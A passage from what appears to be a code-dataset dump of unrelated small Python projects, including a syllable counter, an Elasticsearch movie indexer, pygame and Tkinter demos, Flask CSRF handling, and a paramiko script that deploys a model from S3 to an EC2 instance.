\"(.)(?!\\\\1)[gq]ua(.)(?!\\\\2)[aeiou]\",\n \"dnt$\"]\n\n\n# Compile our regular expressions\nfor i in range(len(fallback_subsyl)):\n fallback_subsyl[i] = re.compile(fallback_subsyl[i])\nfor i in range(len(fallback_addsyl)):\n fallback_addsyl[i] = re.compile(fallback_addsyl[i])\n\ndef 
_normalize_word(word):\n return word.strip().lower()\n\n# Read our syllable override file and stash that info in the cache\nfor line in specialSyllables_en.splitlines():\n line = line.strip()\n if line:\n toks = line.split()\n assert len(toks) == 2\n fallback_cache[_normalize_word(toks[0])] = int(toks[1])\n\ndef count(word):\n word = _normalize_word(word)\n if not word:\n return 0\n\n # Check for a cached syllable count\n count = fallback_cache.get(word, -1)\n if count > 0:\n return count\n\n # Remove final silent 'e'\n if word[-1] == \"e\":\n word = word[:-1]\n\n # Count vowel groups\n count = 0\n prev_was_vowel = 0\n for c in word:\n is_vowel = c in (\"a\", \"e\", \"i\", \"o\", \"u\", \"y\")\n if is_vowel and not prev_was_vowel:\n count += 1\n prev_was_vowel = is_vowel\n\n # Add & subtract syllables\n for r in fallback_addsyl:\n if r.search(word):\n count += 1\n for r in fallback_subsyl:\n if r.search(word):\n count -= 1\n\n # Cache the syllable count\n fallback_cache[word] = count\n\n return count\n\n","repo_name":"mmautner/readability","sub_path":"syllables_en.py","file_name":"syllables_en.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"31"} +{"seq_id":"34509545304","text":"from __future__ import print_function\nfrom elasticsearch import Elasticsearch\nimport io\n\n\nclass Index:\n \"\"\"\n This class indexes files in a given path,passed as a parameter\n \"\"\"\n\n def __init__(self):\n self.client = None\n self.counter = 0\n self.client = Elasticsearch()\n self.lineElements =[]\n self.clustTitles = []\n self.clustGenres = []\n self.clustRanks = []\n self.titles = []\n self.clustSynopses =[]\n\n\n def implement(self):\n f = io.open('static/IMDB-Movie-Data.csv',encoding='utf8')\n lines = f.readlines()[1:]\n for line in lines:\n self.lineElements = line.split(',')\n self.clustTitles.append(self.lineElements[1].replace(\"\\n\",\"\").replace(\"\\n\",\"\"))\n self.clustSynopses.append(str(self.lineElements[3].replace(\"_\",\",\").replace(\"\\n\",\"\")))\n self.clustGenres.append(self.lineElements[2].replace(\"_\",\",\").replace(\"\\n\",\"\"))\n self.clustRanks.append(int(self.lineElements[0].replace(\"\\n\",\"\")))\n json = {\n\n \"Rank\": self.lineElements[0].replace(\"\\n\",\"\"),\n \"Title\": self.lineElements[1].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Genre\": self.lineElements[2].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Description\": self.lineElements[3].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Director\": self.lineElements[4].replace(\"\\n\",\"\"),\n \"Actors\": self.lineElements[5].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Year\": self.lineElements[6].replace(\"\\n\",\"\"),\n \"Runtime(Minutes)\": self.lineElements[7].replace(\"\\n\",\"\"),\n \"Rating\": self.lineElements[8].replace(\"\\n\",\"\"),\n \"Votes\": self.lineElements[9].replace(\"\\n\",\"\"),\n \"Revenue(Millions)\": self.lineElements[10].replace(\"\\n\",\"\"),\n \"Metascore\": self.lineElements[11].replace(\"\\n\",\"\"),\n \"ImageURL\":self.lineElements[12].replace(\"\\n\",\"\").replace(\"\\\"\",\"\")\n }\n\n self.client.index(index=\"imdb\", doc_type='movie', id=(int(self.lineElements[0])-1), body=json)\n f.close()\n\n def searchCategory(self,category):\n\n resultsDes = []\n res = self.client.search(index=\"imdb\", doc_type=\"movie\", body={\"query\": {\"match\": {\"Genre\": category}}})\n for doc in res['hits']['hits']:\n resultsDes.append(doc['_source'])\n return resultsDes\n\n def searchByQuery 
(self,userQuery):\n results= []\n resultsPlot = []\n res = self.client.search(index=\"imdb\", doc_type=\"movie\", body={\"query\": {\"multi_match\": {\"query\": userQuery, \"fields\":[ \"Title\", \"Description\" ]}}})\n print(\"%d documents found\" % res['hits']['total'])\n for doc in res['hits']['hits']:\n results.append(doc[\"_source\"]['Title'])\n resultsPlot.append(doc[\"_source\"]['Description'])\n return results, resultsPlot\n\n def searchByTitle (self,title):\n resultsDetails = []\n res = self.client.search(index=\"imdb\", doc_type=\"movie\", body={\"query\": {\"match\": {\"Title\": title}}})\n print(\"%d documents found\" % res['hits']['total'])\n for doc in res['hits']['hits']:\n resultsDetails.append(doc['_source'])\n return resultsDetails\n\n\n\n\n","repo_name":"sc14ag/epl660IMDB","sub_path":"EPL660/ElasticIndexing.py","file_name":"ElasticIndexing.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34984677225","text":"import pygame\nimport math\n\n\n\nwidth, height = 640, 480\nwindow = pygame.display.set_mode((width, height))\nFPSCLOCK = pygame.time.Clock()\n\nWHITE = pygame.Color(\"white\")\n\nclass arm:\n def __init__(self, window, parent):\n self.startpoint = pygame.math.Vector2(320, 240)\n self.endpoint = pygame.math.Vector2(170, 0)\n self.color = pygame.Color('red')\n self.window = window\n self.angle = 0\n self.length = 100\n self.y = 0\n self.x = 0\n self.parent = parent\n self.func_type = ' '\n\n def getEndPosX(self):\n angle = self.angle\n parent = self.parent\n while(parent):\n angle += parent.angle\n parent = parent.parent\n return self.x + math.cos(angle) * self.length\n \n def getEndPosY(self):\n angle = self.angle\n parent = self.parent #arm1\n while(parent):\n angle += parent.angle\n parent = parent.parent\n return self.y + math.sin(angle) * self.length\n \n def connect(self, point1, point2):\n pygame.draw.line(self.window, self.color, point1, point2, width=4)\n \n def create(self, x, y, length):\n self.x = x\n self.y = y\n pygame.draw.line(self.window, self.color, (x, y), ((x+length),y), width=4)\n\n def update(self, angle, mag):\n self.angle = math.sin(angle) * mag\n self.connect(self.startpoint, (self.getEndPosX(),self.getEndPosY()))\n\n\n\nclass arm_segments(arm):\n def __init__(self, window, parent):\n arm.__init__(self, window, parent)\n\n def update(self, angle, mag, factor, func_type):\n parent = self.parent\n coords = parent.getEndPosX(), parent.getEndPosY()\n \n if func_type == 'cos':\n self.angle = math.cos(angle * factor) * mag\n elif func_type == 'sin':\n self.angle = math.sin(angle * factor) * mag\n else:\n print('Error: func_type must be sin or cos')\n\n self.connect(coords, (self.getEndPosX(),self.getEndPosY()))\n\n\ndef screen(window):\n window.fill(WHITE) \n\narm1 = arm(window, False)\narm2 = arm_segments(window, arm1)\narm3 = arm_segments(window, arm2)\n\ndef main():\n angle = 0\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n \n arm1.create(round(width/2), round(height/2), arm1.length)\n arm2.create(arm1.getEndPosX(), arm1.getEndPosY(), arm2.length)\n arm3.create(arm2.getEndPosX(), arm2.getEndPosY(), arm3.length)\n screen(window)\n arm1.update(angle, 1.2)\n arm2.update(angle, 0.93, 0.873, 'cos')\n arm3.update(angle, 1.34, 1.57, 'sin')\n angle += 0.05\n pygame.display.flip()\n 
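# An aside on the pacing call that follows (a sketch assuming only the
# standard pygame.time.Clock API, not part of the original file):
# Clock.tick(45) caps the loop at roughly 45 frames per second and returns
# the milliseconds elapsed since the previous tick, so a frame-rate-independent
# variant of this animation could scale the step rather than using the fixed
# 0.05 increment:
#     dt_ms = FPSCLOCK.tick(45)
#     angle += 0.05 * dt_ms / (1000.0 / 45)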
FPSCLOCK.tick(45)\nmain()","repo_name":"andysit1/For-Fun-Stuff","sub_path":"kinematics/forward.kinev4.py","file_name":"forward.kinev4.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71481282648","text":"Book = []\n# Method for adding a new Book\ndef Push(Book):\n book = input (\"enter book name : \")\n Book.append(book)\n# method for deleting a book from the list\ndef Pop(Book):\n if (Book == []):\n print(\"stack empty !!\")\n else :\n print(\"Deleted book : \",Book.pop())\ndef Display(Book):\n if (Book == []):\n print(\"stack empty \\nno book found !!\")\n else :\n Top = len(Book)\n print(Book[Top-1])\n for x in range(Top-2,-1,-1):\n print(Book[x])\nprint(25*\"#\",\"|| Book ||\",25*\"#\")\nprint(\"push ☞ 1\\npop ☞ 2\\ndisplay ☞ 3\\nexit ☞ 4\")\nwhile True :\n choice = int(input(\"enter choice : \"))\n if (choice == 1):\n Push(Book)\n elif (choice == 2):\n Pop(Book)\n elif (choice == 3):\n Display(Book)\n elif (choice == 4):\n break\n else :\n print(\"enter a valid choice !!\")\n","repo_name":"alpha2lucifer/Python-programs","sub_path":"folder01/zAssignment_stacks.py","file_name":"zAssignment_stacks.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5577010895","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n merged = ListNode()\n \n curr = merged\n \n while list1 and list2:\n \n if list1.val <= list2.val:\n curr.next = list1\n list1 = list1.next\n else:\n curr.next = list2\n list2 = list2.next\n \n curr = curr.next\n \n if not list1:\n curr.next = list2\n elif not list2:\n curr.next = list1\n \n return merged.next","repo_name":"elvinmirzazada/leetcode-challanges","sub_path":"0021-merge-two-sorted-lists/0021-merge-two-sorted-lists.py","file_name":"0021-merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7662043259","text":"\"\"\"\nHelper functions to manage water data.\n\"\"\"\n\ndef add_data_point(meter=None, event=None, zone1='', zone2='', zone3='', zone4='', date=None):\n \"\"\"\n Adds datapoints to the csv files storing water data, event data, and irrigation\n data.\n\n If meter reading is given, function will write to ../data/water.csv; if event\n is given, function will write to ../data/water-events.csv; if irrigation zone\n data are given, function will write to ../data/water-irrigation.csv. 
If any\n combination of these is given, the function will write to all relevant files.\n\n If no date is given, the function will automatically use today's date.\n\n Parameters\n ----------\n date (str) : Date to be parsed by dateutil.parser.\n If no value passed, defaults to today's date.\n meter (float) : Meter reading\n event (str) : Description of event that might impact water usage\n zone1 (int) : Duration (minutes) of zone 1\n zone2 (int) : Duration (minutes) of zone 2\n zone3 (int) : Duration (minutes) of zone 3\n zone4 (int) : Duration (minutes) of zone 4\n\n Returns\n -------\n none\n\n \"\"\"\n \n parsed_date = _parse_date(date)\n \n if meter:\n _update_meter(parsed_date, meter, path='data/water.csv')\n if event:\n _update_events(parsed_date, event, path='data/water-events.csv')\n if zone1 or zone2 or zone3 or zone4:\n _update_zones(parsed_date, zone1, zone2, zone3, zone4, path='data/water-irrigation.csv')\n\n return\n\n\ndef _update_meter(parsed_date, meter, path):\n \"\"\"\n Appends `parsed_date` and `meter` as a new row to the data file at `path`\n\n \"\"\"\n \n f = open(path, 'a')\n f.write(\"{0},{1}\\n\".format(parsed_date, meter))\n f.close()\n\n return\n\n\ndef _update_events(parsed_date, event, path):\n \"\"\"\n Appends `parsed_date` and `event` as a new row to the data file at `path`\n \"\"\"\n\n f = open(path, 'a')\n f.write(\"{0},{1}\\n\".format(parsed_date, event))\n f.close()\n \n return\n\n\ndef _update_zones(parsed_date, zone1, zone2, zone3, zone4, path):\n \"\"\"\n Appends `parsed_date`, `zone1`, `zone2`, `zone3`, and `zone4` as a new row to the file at\n path.\n \"\"\"\n\n f = open(path, 'a')\n f.write(\"{0},{1},{2},{3},{4}\\n\".format(parsed_date, zone1, zone2, zone3, zone4))\n f.close()\n\n return\n\n\ndef _parse_date(date):\n \"\"\"\n Helper function that returns the parsed date using dateutil.parser. If\n no value is provided, the function returns today's date.\n\n Parameters\n ----------\n date (str) : Date to parse\n \n Returns\n -------\n parsed_date (datetime.datetime) : Parsed date\n \"\"\"\n\n from datetime import datetime\n from dateutil import parser\n\n if date: # If a date was passed, validate it\n parsed_date = parser.parse(date)\n parsed_date = datetime.strftime(parsed_date, '%Y-%m-%d')\n else: # Otherwise, use today's date\n parsed_date = datetime.today().strftime('%Y-%m-%d')\n\n return parsed_date\n","repo_name":"zrottman/data-exploration","sub_path":"water/water_funcs.py","file_name":"water_funcs.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75018663127","text":"import sys\nsys.setrecursionlimit(10 ** 8)\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\n\ndef dfs(start, group):\n visited[start] = group\n\n for i in arr[start]:\n if not visited[i]:\n a = dfs(i, -group)\n if not a:\n return False\n elif visited[i] == visited[start]:\n return False\n return True\n\n\nn = int(input())\n\nfor _ in range(n):\n v, e = map(int, input().split()) # number of vertices V and number of edges E\n arr = [[] for _ in range(v+1)]\n visited = [False] * (v+1)\n\n for _ in range(e):\n a, b = map(int, input().split())\n arr[a].append(b)\n arr[b].append(a)\n\n for i in range(1, v + 1):\n if not visited[i]:\n result = dfs(i, 1)\n if not result:\n break\n print(\"YES\" if result else \"NO\")\n","repo_name":"dongury1114/swjungle_week03_team5","sub_path":"euisung/2022.04.20/1707.py","file_name":"1707.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23851948305","text":"from OpenGL.GL import glClearDepth, glClearColor, glDepthFunc, glClear, glEnable, glFrontFace, GL_DEPTH_TEST, GL_LEQUAL, GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT, GL_CW, GL_CULL_FACE\nfrom cyglfw3 import GetTime\n\nfrom .node import Node\nfrom .camera import Camera\nfrom odyn.input import Input\n\n\nclass Timer(object):\n def __init__(self):\n self.tick = GetTime()\n self.last_tick = self.tick\n self.delta = 0\n\n def update(self):\n self.last_tick = self.tick\n self.tick = GetTime()\n self.delta = self.tick - self.last_tick\n\n def __repr__(self):\n return \"Timer(last_tick={0}, tick={1}, delta={2})\".format(self.last_tick, self.tick, self.delta)\n\n\nclass Scene(Node):\n def __init__(self, window):\n self.timer = Timer()\n self.window = window\n super(Scene, self).__init__()\n\n def onInit(self):\n glEnable(GL_DEPTH_TEST)\n glClearDepth(1.0)\n glDepthFunc(GL_LEQUAL)\n\n glEnable(GL_CULL_FACE)\n glFrontFace(GL_CW)\n\n self.cam = Camera(self.window)\n self.timer = Timer()\n\n # Register Input component\n self.components.append(Input(self.window, self))\n\n def onRender(self):\n glClearColor(1.0, 0.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n self.cam.onRender()\n\n def update(self):\n self.timer.update()\n super(Scene, self).update(self.timer)\n","repo_name":"python33/odyn","sub_path":"odyn/scene/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21712171499","text":"from flask import Flask\nfrom flask import flash\nfrom flask import request\nfrom flask import current_app\nfrom flask import render_template\nfrom wtforms import ValidationError\nfrom flask_wtf.csrf import 
CSRFProtect\nfrom flask_wtf.csrf import validate_csrf\n\ncsrf = CSRFProtect()\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret key'\ncsrf.init_app(app)\n\n\n@app.route('/', methods=('GET', 'POST'))\ndef index():\n if request.method == 'POST':\n current_app.logger.debug(request.values)\n csrf_token = request.values.get('csrf_token')\n try:\n validate_csrf(csrf_token)\n except ValidationError as e:\n current_app.logger.error(e)\n flash(e.args[0])\n else:\n action = request.values.get('action')\n flash(f'{action} successful')\n\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"AngelLiang/Flask-Demos","sub_path":"HT01-flask-post-button/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"17083757503","text":"import common\nimport wcodegen\n\n\nclass PythonBitmapButtonGenerator(wcodegen.PythonWidgetCodeWriter):\n tmpl = '%(name)s = %(klass)s(%(parent)s, %(id_number)s, ' \\\n '%(bitmap)s%(style)s)\\n'\n\n# end of class PythonBitmapButtonGenerator\n\n\nclass CppBitmapButtonGenerator(wcodegen.CppWidgetCodeWriter):\n tmpl = '%(name)s = new %(klass)s(%(parent)s, %(id_number)s, ' \\\n '%(bitmap)s%(style)s);\\n'\n\n# end of class CppBitmapButtonGenerator\n\n\ndef xrc_code_generator(obj):\n xrcgen = common.code_writers['XRC']\n\n class BitmapButtonXrcObject(xrcgen.DefaultXrcObject):\n def write_property(self, name, val, outfile, tabs):\n if name == 'disabled_bitmap':\n name = 'disabled'\n\n if name in ['bitmap', 'selected', 'focus', 'disabled', 'hover']:\n prop = self._format_bitmap_property(name, val)\n if prop:\n line = '%s%s' % (self.tabs(tabs), prop)\n outfile.write(line)\n return\n\n xrcgen.DefaultXrcObject.write_property(\n self, name, val, outfile, tabs)\n\n # end of class BitmapButtonXrcObject\n\n return BitmapButtonXrcObject(obj)\n\n\ndef initialize():\n klass = 'wxBitmapButton'\n common.class_names['EditBitmapButton'] = klass\n common.register('python', klass, PythonBitmapButtonGenerator(klass))\n common.register('C++', klass, CppBitmapButtonGenerator(klass))\n common.register('XRC', klass, xrc_code_generator)\n","repo_name":"FreePLC/FreePLC_IDE","sub_path":"IDE_Source/python/Lib/site-packages/wxglade/widgets/bitmap_button/codegen.py","file_name":"codegen.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"15076848028","text":"from tkinter.filedialog import *\nimport PyPDF2\nfrom gtts import gTTS\n\nbook = askopenfilename()\nreader = PyPDF2.PdfFileReader(book)\npages = reader.numPages\nfor page in range(0, pages):\n cur_page = reader.getPage(page)\n mytext = cur_page.extractText()\n #print(mytext)\n audio = gTTS(text = mytext, lang = 'en', slow = False)\n audio.save('try.mp3')\nos.system('try.mp3')\n","repo_name":"etzard-fa/python-playrground","sub_path":"audio-book-from-pdf/audiobook.py","file_name":"audiobook.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32320799989","text":"# coding: utf-8\n\nclass Solution:\n def __init__(self):\n self.cache = {}\n\n # @param n: an integer\n # @return: a boolean which equals to True if the first player will win\n def firstWillWin(self, n):\n # write your code here\n if n == 0:\n return False\n elif n <= 2:\n return True\n if n not in self.cache:\n 
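# A note on the memoized recurrence below (an illustrative aside, not part of
# the original solution): with 1 or 2 coins taken per turn and the last coin
# winning, the losing positions are exactly the multiples of 3, so the whole
# function is equivalent to `return n % 3 != 0`. For example, n = 3 loses
# (the opponent mirrors each move and takes the 3rd coin), while n = 4 wins
# (take one coin and hand the opponent the losing position n = 3).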
'''\n If the first player takes coin n - 3, then no matter whether the\n second player takes 1 or 2 coins, the n-th coin is guaranteed to be\n taken by the first player.\n '''\n self.cache[n] = self.firstWillWin(n - 3)\n return self.cache[n]\n\n# medium: http://lintcode.com/zh-cn/problem/coins-in-a-line/\n","repo_name":"yingl/LintCodeInPython","sub_path":"coins-in-a-line.py","file_name":"coins-in-a-line.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"74045900888","text":"import paramiko\nfrom os.path import expanduser\nfrom user_definition import *\nimport time\n\n\n# ## Assumption : Anaconda, Git (configured)\n\ndef ssh_client():\n \"\"\"Return ssh client object\"\"\"\n return paramiko.SSHClient()\n\n\ndef ssh_connection(ssh, ec2_address, user, key_file):\n \"\"\"Connect to a specified ec2 instance\"\"\"\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ec2_address, username=user,\n key_filename=expanduser(\"~\") + key_file)\n print(\"SSH connection done.\")\n return ssh\n\n\ndef create_or_update_environment(ssh):\n \"\"\"Create or update the conda environment from environment.yml with all dependencies\"\"\"\n stdin, stdout, stderr = ssh.exec_command(\"sudo yum -y install gcc\")\n stdin, stdout, stderr = \\\n ssh.exec_command(\"conda env create -f \"\n \"~/{}/environment.yml\".format(git_repo_name))\n\n if b'already exists' in stderr.read():\n stdin, stdout, stderr = \\\n ssh.exec_command(\"conda env update -f \"\n \"~/{}/environment.yml\".format(git_repo_name))\n print(\"Git repo cloned/updated.\")\n print(\"Environment created.\")\n\n\ndef git_clone(ssh):\n \"\"\"Clones specified repo if not present, otherwise \\\n updates repo via git pull command\"\"\"\n stdin, stdout, stderr = ssh.exec_command(\"git --version\")\n\n if b\"\" == stderr.read():\n git_clone_command = \"git clone \\\n https://{}@github.com/{}/{}.git\".format(\n git_user_id, git_repo_owner, git_repo_name)\n stdin, stdout, stderr = ssh.exec_command(git_clone_command)\n\n # if git repo already exists, pull\n if b'already exists' in stderr.read():\n cd_and_pull_repo = \"cd {}; git pull\".format(git_repo_name)\n stdin, stdout, stderr = ssh.exec_command(cd_and_pull_repo)\n\n\ndef logout(ssh):\n \"\"\"Close ssh connection\"\"\"\n stdin, stdout, stderr = ssh.exec_command(\"logout\")\n print(\"Logged out.\")\n ssh.close()\n\n\ndef deploy_model(ssh):\n \"\"\"Pull model from S3\"\"\"\n # if aws_access_key_id and aws_secret_access_key:\n # stdin, stdout, stderr = ssh.exec_command(\"mkdir ~/.aws\")\n # if b\"File exists\" not in stderr.read():\n # stdin, stdout, stderr = ssh.exec_command(\n # \"touch ~/.aws/credentials\")\n # stdin, stdout, stderr = ssh.exec_command(\"echo [default] >> \\\n # ~/.aws/credentials\")\n # stdin, stdout, stderr = ssh.exec_command(\"echo aws_access_key_id\n # = \\\n # {} >> ~/.aws/credentials\".format(aws_access_key_id))\n # stdin, stdout, stderr = ssh.exec_command(\"echo\n # aws_secret_access_key = \\\n # {} >> ~/.aws/credentials\".format(aws_secret_access_key))\n # stdin, stdout, stderr = ssh.exec_command(\"rm -rf ~/{}/app/models\".format(\n # git_repo_name))\n # stdin, stdout, stderr = ssh.exec_command(\"mkdir ~/{}/app/models\".format(\n # git_repo_name))\n # else:\n stdin, stdout, stderr = ssh.exec_command(\n \"rm -rf ~/{}/models\".format(git_repo_name))\n stdin, stdout, stderr = ssh.exec_command(\n \"mkdir ~/{}/models\".format(git_repo_name))\n stdin, stdout, stderr = ssh.exec_command(\"~/.conda/envs/armr/bin/aws \\\n s3 ls msds-armr --recursive | sort | tail -n 1 | awk '{print $4}'\")\n model = 
stdout.read().strip().decode(\"utf-8\")\n\n stdin, stdout, stderr = ssh.exec_command(f\"~/.conda/envs/armr/bin/aws \\\n s3 cp s3://{bucket_name}/{model} ~/{model}\")\n time.sleep(20)\n stdin, stdout, stderr = \\\n ssh.exec_command(\"unzip ~/{} -d \\\n ~/{}/models/\".format(model, git_repo_name))\n print(stdout.read())\n\n\ndef launch_flask(ssh):\n ssh.exec_command(\"chmod u+x /home/ec2-user/ARMR/code/flask.sh\")\n ssh.exec_command(\"bash /home/ec2-user/ARMR/code/flask.sh\")\n print(\"Flask app running on port 80.\")\n\n\ndef main():\n \"\"\"Connect to a specified ec2 instance and create/update a \\\n conda environment\"\"\"\n ssh = ssh_client()\n ssh_connection(ssh, ec2_address, user, key_file)\n git_clone(ssh)\n create_or_update_environment(ssh)\n deploy_model(ssh)\n launch_flask(ssh)\n logout(ssh)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tylerursuy/ARMR","sub_path":"code/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14992836636","text":"from enum import EnumType\nimport json\nimport types\nfrom typing import Any, get_args, get_origin, get_type_hints\n\nfrom .util import (\n SIMPLE_TYPES,\n SerializationError,\n Translated,\n get_type_name,\n verify_type,\n)\n\n\ndef serialize_item(item: Any, expected_type: Any) -> Translated:\n if type(expected_type) == type and expected_type in SIMPLE_TYPES:\n verify_type(item, expected_type)\n return item\n\n if isinstance(expected_type, types.GenericAlias):\n return serialize_generic(item, expected_type)\n if isinstance(expected_type, types.UnionType):\n return serialize_union(item, expected_type)\n if isinstance(expected_type, EnumType):\n return serialize_enum(item, expected_type)\n\n return serialize_object(item, expected_type)\n\n\ndef serialize_enum(item: Any, expected_type: EnumType):\n verify_type(item, expected_type)\n return item.value\n\n\ndef serialize_union(item: Any, type_info: types.UnionType) -> Translated:\n for t in get_args(type_info):\n if isinstance(t, types.GenericAlias):\n try: # check if it's this generic type\n return [get_type_name(t), serialize_generic(item, t)]\n except SerializationError:\n pass\n elif type(item) == t:\n return [get_type_name(t), serialize_item(item, t)]\n\n raise SerializationError(\n f\"Union type {type_info} has failed to serialize: {type(item)} not in union\"\n \" type\"\n )\n\n\ndef serialize_generic(collection: Any, type_info: types.GenericAlias) -> Translated:\n expected_type: Any = get_origin(type_info)\n verify_type(collection, expected_type)\n if expected_type in (list, set):\n item_type = get_args(type_info)[0]\n return [serialize_item(i, item_type) for i in collection]\n if expected_type == dict:\n key_type, value_type = get_args(type_info)\n return [\n [serialize_item(k, key_type), serialize_item(v, value_type)]\n for k, v in collection.items()\n ]\n if expected_type == tuple:\n item_types = get_args(type_info)\n return [serialize_item(i, t) for i, t in zip(collection, item_types)]\n raise SerializationError(f\"Generic type {expected_type} is not supported\")\n\n\ndef serialize_object(data: object, expected_type: type) -> Translated:\n verify_type(data, expected_type)\n type_hints = get_type_hints(type(data))\n out = []\n for name, t in type_hints.items():\n out.append(serialize_item(getattr(data, name), t))\n return out\n\n\ndef serialize(\n data: object,\n set_type: Any | None = None,\n indent: int | None = None,\n) -> str:\n return 
json.dumps(\n serialize_item(data, set_type if set_type else type(data)), indent=indent\n )\n","repo_name":"fdelu/distribuidos-tp1","sub_path":"src/system/common/serde/internal/serialize.py","file_name":"serialize.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72679587288","text":"import customtkinter\ncustomtkinter.set_appearance_mode(\"System\")\ncustomtkinter.set_default_color_theme(\"blue\")\n\nclass App(customtkinter.CTk):\n def __init__(self):\n super().__init__()\n self.title(\"Complex Example\")\n self.geometry(\"1000x500\")\n\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(1, weight=1)\n\n self.navigation = NavigationFrame(self, controller=self)\n self.navigation.grid(row=0, column=0, sticky=\"nesw\")\n\n self.frame2 = Frame2(self, controller=self)\n self.frame1 = Frame1(self, controller=self)\n self.frame1.grid(row=0, column=1, sticky=\"nsew\")\n self.frame2.grid(row=0, column=1, sticky=\"nsew\")\n\nclass NavigationFrame(customtkinter.CTkFrame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\n self.controller = controller\n self.configure(fg_color=\"grey15\")\n\n title = customtkinter.CTkLabel(self, text=\"Navigation\", anchor=\"center\", font=(\"Helvetica\", 20))\n title.grid(row=0, column=0, padx=(20, 20), pady=(15,15))\n\n test1 = customtkinter.CTkButton(self, text=\"Frame 1\", anchor=\"center\", fg_color=\"transparent\", border_color=\"#3B8ED0\", border_width=2, command=self.one_event)\n test1.grid(row=1, column=0, padx=(20, 20), pady=(15,15))\n\n test2 = customtkinter.CTkButton(self, text=\"Frame 2\", anchor=\"center\", fg_color=\"transparent\", border_color=\"#3B8ED0\", border_width=2, command=self.two_event)\n test2.grid(row=2, column=0, padx=(20, 20), pady=(15,15))\n\n def one_event(self):\n self.controller.frame1.tkraise()\n\n def two_event(self):\n self.controller.frame2.tkraise()\n\nclass Frame1(customtkinter.CTkFrame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(0, weight=1)\n\n title = customtkinter.CTkLabel(self, text=\"Frame 1!\", anchor=\"center\")\n title.grid(row=0, column=0)\n\nclass Frame2(customtkinter.CTkFrame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(0, weight=1)\n\n title = customtkinter.CTkLabel(self, text=\"Frame 2!\", anchor=\"center\")\n title.grid(row=0, column=0)\n\napp = App()\napp.mainloop()\n","repo_name":"SFavela-hub/CustomTkinterBlog","sub_path":"complex.py","file_name":"complex.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9125099376","text":"import spotipy\r\nimport sys\r\nfrom spotipy.oauth2 import SpotifyClientCredentials\r\n\r\nclass Spotify:\r\n\r\n\tdef __init__(self):\r\n\t\tclient_credentials_manager = SpotifyClientCredentials(client_id='ID', client_secret='ID')\r\n\t\tself.spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\r\n\r\n\tdef find_song(self, song, artist):\r\n\t\tresults = self.spotify.search(q=song, type = 'track')\r\n\t\titems = results['tracks']['items']\r\n\t\tfor index, tracks in enumerate(items):\r\n\t\t\ttrack = items[index]\r\n\t\t\tcurrent_artist = track['artists'][0]['name']\r\n\t\t\tif current_artist == artist:\r\n\t\t\t\treturn 
